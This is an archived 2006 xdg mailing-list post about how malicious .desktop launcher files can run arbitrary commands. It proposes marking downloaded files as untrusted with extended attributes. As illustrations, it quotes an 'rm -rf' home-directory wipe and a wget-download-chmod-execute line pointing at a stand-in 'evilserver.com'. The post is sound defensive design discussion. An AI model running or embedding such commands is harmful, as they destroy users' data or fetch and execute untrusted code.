Security issue with .desktop files revisited

Francois Gouget fgouget at codeweavers.com
Tue Mar 28 12:32:25 EEST 2006 

Mike Hearn wrote:
> On Thu, 23 Mar 2006 17:55:26 +0100, Thiago Macieira wrote:
> 
>>I don't see how it is any different from .desktop files with:
>>Exec=/bin/sh -c 'cd ; rm -rf *'
>>(don't run that!)
> 
> It's not really, except you can write longer programs and even run
> arbitrary ELF programs too.

Not even. First KDE, at least, lets you specify multiple commands 
separated by semi-colon so you could drop the 'sh -c':

Exec=/usr/X11R6/bin/xeyes;/usr/X11R6/bin/xeyes

But more importantly a small shell command is all you need to execute 
arbitrary code:

Exec=sh -c 'wget -O /tmp/evil http://evilserver.com/evil;chmod u+x 
/tmp/evil;/tmp/evil"

Where 'evil' is any arbitrary executable. All that protects you is that 
wget might possibly not be installed.


>>It looks like the best alternative.
>>
>>But why should we require users to go the properties and turn it
>>executable? If you've got a legitimate .desktop file, it already follows
>>the guidelines, which may include being executable or not.

If think the solution would be to do like Windows XP SP2 does (or maybe 
it is Windows 2003). When you download a file (at least using IE and 
depending on your 'zone' settings), it sets some 'extended file 
attributes' to tag the file as untrusted. Then when you try to execute 
that file, ShellExecute() (maybe CreateProcess() too) warns you that the 
file may represent a security risk. If you decide to continue, then it 
clears the extended file attribute so you don't get the warning again 
and again. That attribute is also copied when you copy or rename the 
file (at least I think so, if using the standard OS tools).

What this would mean for Linux:
  * ext3 and other filesystems have support for extended attributes so 
the basic support is there (though I'm not sure how windely used/stable 
extended attributes support is).
  * a standard would need to be defined so all involved applications use 
the same extended attribute for this purpose
  * applications that download stuff from the internet would need to set 
that extended attribute. This means Konqueror, Firefox & co, 
Thunderbird, Evolution, but, ideally, also wget, etc.
  * file managers and desktop shells should warn the user when he tries 
to run a file with this 'untrusted' extended attribute.

So in the above scenario, when the user downloads the rogue '.desktop' 
file to his desktop, that file will be tagged as 'untrusted'. Then, 
clicking on it would warn the user before running it. .desktop files 
shipped with the distribution would not have the 'untrusted' bit and 
thus would not issue this warning. Also, this warning could be 
selectively issued only for .desktop and 'executable' files, and not if 
the file is merely a simple jpeg. But that could be configurable and a 
'paranoid' setting would warn for all untrusted files (in case they are 
designed to trigger buffer overflows).

Such a solution requires quite a bit of work and time to be implemented 
but then I think any solution to this problem do.

-- 
Francois Gouget
fgouget at codeweavers.com

More information about the xdg mailing list